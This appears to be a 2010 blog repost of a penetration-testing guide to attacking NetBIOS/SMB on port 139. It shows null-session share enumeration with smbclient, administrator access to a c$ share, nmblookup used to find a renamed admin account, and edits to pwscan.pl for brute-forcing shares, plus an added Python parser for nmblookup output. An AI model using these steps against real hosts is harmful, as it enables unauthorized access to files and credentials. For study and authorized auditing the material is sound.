Sunday, October 24, 2010

NetBIOS/SMB (139 TCP)

SMB is used by Windows machines (and, with SAMBA, even Unix machines) to communicate. A lot can be done through an open NetBIOS port. The first thing is to try to find out what shares are advertised on the server. Some servers are not configured well and will reveal their shares without a username or password (using a NULL connection).
>smbclient -L 209.xxx.68.66 -n "justatest"
Password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 2.0.3]

        Sharename      Type      Comment
        ---------      ----      -------
        winshares      Disk      FreeBSD Samba Server
        IPC$           IPC       IPC Service (Samba 2.0.3)

        Server               Comment
        ---------            -------
        FILES                Samba 2.0.3

        Workgroup            Master
        ---------            -------
(Note the -n switch: we don't want to announce ourselves to the server under our own machine name, just in case you are running SAMBA yourself.) As you can see, we find some lovely information on the server: the workgroup/domain name, the description and the Windows version (the server above was actually a SAMBA server). Nice... Of course, with a known password or a blank password things are much more fun: you can list all the shares, or you might want to access a drive:
> smbclient \\\\208.xxx.198.71\\c$ -U administrator -n "justatest"
Password:
Domain=[xxx] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> ls
  WINNT                 D        0  Fri Oct  8 23:24:02 1999
  NTDETECT.COM       AHSR    26816  Fri Aug 11 01:22:24 2000
  ntldr              AHSR   156496  Fri Aug 11 01:22:24 2000
  boot.ini            ASR      288  Sat Oct  9 00:30:56 1999
  ffastun.ffo          AH   208896  Fri Dec 29 00:35:34 2000
  Program Files         D        0  Fri Oct  8 23:28:10 1999
  CONFIG.SYS            A        0  Fri Oct  8 23:31:46 1999
  AUTOEXEC.BAT          A        0  Fri Oct  8 23:31:46 1999
  IO.SYS             AHSR        0  Fri Oct  8 23:31:46 1999
  MSDOS.SYS          AHSR        0  Fri Oct  8 23:31:46 1999
  TEMP                  D        0  Fri Oct  8 23:31:50 1999
--cut--
You are now dropped into the smbclient "shell". From here you could do file transfers and the like (see Chapter 6, "What now"). You should really be able to figure out how "smbclient" works on your own...
You might also want to try to collect information with the "nmblookup" command. It sometimes helps to find the administrator username (if it was changed):
# nmblookup -A 160.124.19.99
Looking up status of 160.124.19.99
received 10 names
HUTSI <00> - B
SENSEPOST <00> - B
HUTSI <20> - B
HUTSI <03> - B
SENSEPOST <1e> - B
SENSEPOST <1d> - B
INet~Services <1c> - B
..__MSBROWSE__. <01> - B
IS~HUTSI <00> - B
BAAS <03> - B
Look at the entries marked <03>. Note "BAAS": "Baas" is the renamed administrator username. So forget trying "administrator" as the username.
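As an added example (not part of the original post, and not code from the SAMBA tools), here is a small Python parser for the nmblookup -A name table shown above. It labels each entry with the well-known meaning of its suffix and makes the reasoning from the text explicit: a <03> (messenger service) name that is not the machine's own name is a logged-on user, which is exactly what an administrator auditing a host's NetBIOS exposure wants flagged. The suffix table and the <GROUP> flag handling come from nmblookup's normal output format, not from this page; the sample input is the name table above.

```python
import re
from typing import List, NamedTuple
# Well-known NetBIOS name suffixes (the hex value printed in angle brackets).
SUFFIX_MEANING = {
    "00": "workstation service (unique) / domain name (group)",
    "01": "master browser announcement (__MSBROWSE__)",
    "03": "messenger service: the computer name or a logged-on user",
    "1c": "domain controllers",
    "1d": "master browser",
    "1e": "browser service elections",
    "20": "file server service",
}
# One parsed entry; 'group' is True when nmblookup prints a <GROUP> flag for it.
NbName = NamedTuple("NbName", [("name", str), ("suffix", str), ("group", bool)])
# A name-table line: name, <suffix>, "-", then flags such as "B" or "<GROUP> B <ACTIVE>".
LINE_RE = re.compile(r"^\s*(\S.*?)\s+<([0-9A-Fa-f]{2})>\s*-\s*(.*)$")
# Sample input: the name table from the nmblookup run above.
SAMPLE = """HUTSI <00> - B
SENSEPOST <00> - B
HUTSI <20> - B
HUTSI <03> - B
SENSEPOST <1e> - B
SENSEPOST <1d> - B
INet~Services <1c> - B
..__MSBROWSE__. <01> - B
IS~HUTSI <00> - B
BAAS <03> - B
"""

def parse_nmblookup(text: str) -> List[NbName]:
    """Parse the name table printed by 'nmblookup -A host'; other lines are ignored."""
    names = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            names.append(NbName(m.group(1), m.group(2).lower(), "<GROUP>" in m.group(3)))
    return names

def machine_names(names: List[NbName]) -> set:
    """Unique <00>/<20> names are the host's own workstation and file-server registrations."""
    return {n.name for n in names if n.suffix in ("00", "20") and not n.group}

def logged_on_users(names: List[NbName]) -> List[str]:
    """<03> names that are not the machine name itself are logged-on user names (BAAS above)."""
    hosts = machine_names(names)
    return sorted(n.name for n in names if n.suffix == "03" and n.name not in hosts)

def describe(names: List[NbName]) -> List[str]:
    """One readable line per entry with the meaning of its suffix."""
    return [f"{n.name} <{n.suffix}> {SUFFIX_MEANING.get(n.suffix, 'unknown')}" for n in names]
```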
You also want to have a look at VLAD (yet again). The pwscan.pl script does a good job of brute-forcing NetBIOS (run it with the switches -v and -B). The pwscan.pl script actually uses the "smbclient" command and inspects the output to find a valid username and password combination. If you want to brute-force a specific share, you will need to modify these lines (starting at line 610 in version 1.17):
$cmd = "smbclient";
$service = "//".$target."/ipc\$";
@args = ($service, "'".$pass."'",
         "-U", $user);
$s = Expect->spawn($cmd, @args);
to read something like:
$cmd = "smbclient";
$service = "//".$target."/sharename";   # put the share you want to test here
@args = ($service, "'".$pass."'",
         "-U", $user);
$s = Expect->spawn($cmd, @args);
An excellent paper on NetBIOS and the CIFS protocol by Hobbit can be found at http://packetstorm.securify.com/docs/infosec/cifs.txt. You really should try to read it.
Added: you should really look at a tool called CIS by David Litchfield (nowadays with @stake). It does a lot of cool stuff, and it does wonders for SMB.
